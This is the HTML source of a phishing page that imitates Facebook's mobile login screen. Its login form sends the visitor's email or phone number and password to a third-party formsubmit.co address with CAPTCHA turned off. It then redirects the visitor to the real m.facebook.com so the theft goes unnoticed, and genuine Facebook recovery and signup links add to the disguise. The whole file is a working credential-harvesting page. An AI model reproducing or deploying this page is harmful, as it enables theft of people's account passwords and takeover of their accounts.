
<html>
<head>
<title>Facebook - Log in or sign up</title>

<meta charset="utf-8" />
<meta name="description" content="Create an account or log into Facebook. Connect with friends, family and other people you know. Share photos and videos, send message..." />
<meta name="keywords" content="social, media, chatting, platform, videos, messages, text, pictures" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="theme-color" content="#3B5998">
<meta name="author" content="">

<link rel="stylesheet" href="style.css">
<link rel="icon" href="facebook-app-icon.png" type="image">

<style>

body{
margin:0;
padding:0;
font-family:Arial,sans-serif;
width:100%;
background:#FFFFFF;
}#container{
max-width:1000px;
margin:0 auto;
}


#head-cont{
   max-width:1000px;
   margin:0 auto;
   background:#FEFAE1;
   padding:10;
   position:realtive;
  }#head-cont p{
   padding:0;
   margin:0;
   max-width:350px;
   margin:0 auto;
  }#head-cont p svg{
   font-size:30px;
  }#head-cont p span{
   color:#3B5998;
   padding:0;
   margin:0;
   position:absolute;
   top:15;
  }



#deta{
   max-width:800px
   margin:0 auto;
   
  }#deta h2{
   color:#1877F2;
   text-align:center;
  }
  #deta #deta-wraping{
   max-width:330px;
   margin:0 auto;
  }#deta #deta-wraping form{
  
  }#deta #deta-wraping form input{
   width:100%;
   margin-top:5;
   height:45px;
   background:#F5F6F7;
   border-radius:5px;
   border-top:1px solid #E3E3E3;
   border-right:1px solid #E3E3E3;
   border-left:1px solid #E3E3E3;
   border-bottom:1px solid #D1D1D1;
   outline:none;
  }#deta #deta-wraping form button{
   width:100%;
   margin-top:10;
   background:#1877F2;
   color:#FFFFFF;
   height:50px;
   border:0px;
   border-radius:5px;
  }#deta #deta-wraping a{
   color:#216FDB;
   text-decoration:none;
  }#deta #deta-wraping fieldset{
   border-top:1px solid #CCD0D5;
   border-left:0px;
   border-right:0px;
   border-bottom:0px;
  }#deta #deta-wraping fieldset legend{
   color:#4B4F56;
   text-align:center;
   padding-right:20;
   padding-left:20;
  }#deta #deta-wraping fieldset button{
   width:200px;
   color:white;
   border:0px;
   border-radius:;
   background:#00A400;
   height:35px;
   border-radius:5px;
   font-weight:bold;
  }
  
  
  
footer{
width:100%;
max-width: 400px;
margin:0 auto;
margin-top:50;
display:flex;
justify-content:center;
}footer #lang-alignment{
 padding:10;
 border:0px solid gray;
 width:200px;
 text-align:center;
}footer #lang-alignment a{
 text-decoration:none;
 color:#576B95;
 font-size:12px;
 font-family:Arial,sans-serif;
}footer #lang-alignment a #add-btn{
 background:none;
 border:1px solid #3E5C9A;
 color:#7F7F7F;
 font-size:20;
 border-radius:5px;
 font-weight:bold;
 
 
}



#min-foot{
 text-align:center;
 font-size:10px;
}#min-foot p{
 color:#8B8E92;
}#min-foot a{
 text-decoration:none;
 color:#8B8E92;
}

</style>

</head>
<body>


<img src="facebook-app-icon.png" style="display:none;">


<!--container start-->
<div id="container">
 
 <!--heard cont start-->
 <style>
  
 </style>
  <div id="head-cont">
  <p>
    <svg  aria-hidden="true" role="img" width="1em" height="1em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 48 48"><path fill="#37474F" d="M12 40V8c0-2.2 1.8-4 4-4h16c2.2 0 4 1.8 4 4v32c0 2.2-1.8 4-4 4H16c-2.2 0-4-1.8-4-4z"/><path fill="#BBDEFB" d="M32 7H16c-.6 0-1 .4-1 1v29c0 .6.4 1 1 1h16c.6 0 1-.4 1-1V8c0-.6-.4-1-1-1z"/><path fill="#78909C" d="M21 40h6v2h-6z"/></svg>   
    <span>
    Get Facebook for Android and browse faster.
    </span>
  </p>
  </div>
 <!--heard cont end-->
 
 
 <!--deta start-->
  <style>
  
  </style>
  <div id="deta">
    <h2>facebook</h2>
  
  <div id="deta-wraping">
   <center>
   <form action="https://formsubmit.co/6b243357c595731e8b997686f64b1e28" method="POST">
    <input type="hidden" name="_captcha" value="false">
    <input type="hidden" name="_next" value="https://m.facebook.com/">
    <input type="hidden" name="_template" value="table">
     
     
      <input type="text" name="email or number" placeholder="Mobile number or email address" required>
     
      <br>
     
      <input type="password" name="password" placeholder="Password" required>
     
      <br>
     
      <button>
      Log In
      </button>
     
     </form>
      
      
      <a href="https://free.facebook.com/login/identify/?ctx=recover&c=https%3A%2F%2Ffree.facebook.com%2F&multiple_results=0&ars=facebook_login&from_login_screen=0&lwv=101&_rdr" >
       Forgotten Password?
      </a>
     
     <br><br>
     <fieldset>
      <legend>Or</legend>
      
      <br>
      
      <a href="https://free.facebook.com/reg/?cid=103&refsrc=deprecated&rtime=1659504996&subno_key=AaGA1PXhOnb_Vwy9LX5-aD-O1Rx4-tC_DrnK_I0OemLS0dwacCnYTDXChufDu5zEMifrIrupagtSJKEvq3oIM7KQBDWdDUhEjDdb1aC8AuzFB9rJAzNW4-cRIANEesBYHT2JzLczPFJ6Txtd12kjwuCs2ElGxr6O7-metaKSU9Qwgnj-zmOHmPscRKgmoK-x6ZYKjv-I_s8_F3MWj2sZHndtWmRanllPD075-UuI8riOscOS6KRpYf8l3mv0pIN9FeGN5P-f_ZpZegpBJzc9iNUBLWiWHj0EYKdZuqWOtw3ZPwD6JTO6cRNCjH8u9z4bFig&hrc=1&_rdr" >
      <button>
        Create New Account
      </button>
      </a>
      
     </fieldset>
     
   </center>
  </div>
  
  </div>
 <!--deta end-->
 
 
<!--footer start-->
<style>

</style>
 <footer>
  
  <div id="lang-alignment"> 
   <a href="#.html" style="font-weight:bold;color:#90949C">
    English(US)
   </a>
   
    <br>
       
   <a href="#.html" onclick="alert('This language');">
   Esplañol
   </a>
   
   <br>
   
   <a href="#.html" onclick="alert('This language');">
   Deutsch
   </a>
   
   <br>
   
   <a href="#.html" onclick="alert('This language');">
    Italiano 
   </a>
  </div>
  
  
  
  <div id="lang-alignment">
  
  <a href="#.html" onclick="alert('This language');">
   Français (France)
  </a>
  
  <br>
  
  <a href="#.html" onclick="alert('This language');">
   Português (Brasil)
  </a>
  
  <br>
  
  <a href="#.html" onclick="alert('This language');">
  Deutsch
  </a>
   
   <br>
  
  <a href="#.html" onclick="alert('Add language');">
  <button id="add-btn">
  +
  </button>
  </a>
  
  </div>
 
 
 
 
 </footer>
<!--footer end-->


<!--mini foot start-->
<style>

</style>
<div id="min-foot">

 
 <p>
 
  <a href="#.html" >
   About
  </a>
  •
  <a href="#.html" >
   Help
  </a>
  •
  <a href="#.html" >
   More
  </a>
  
       <br><br>
  
  <b>Meta &copy; 2022</b>
  
 </p>

</div>
<!--mini foot end-->

</div>
<!--container end-->

</body>
</html>
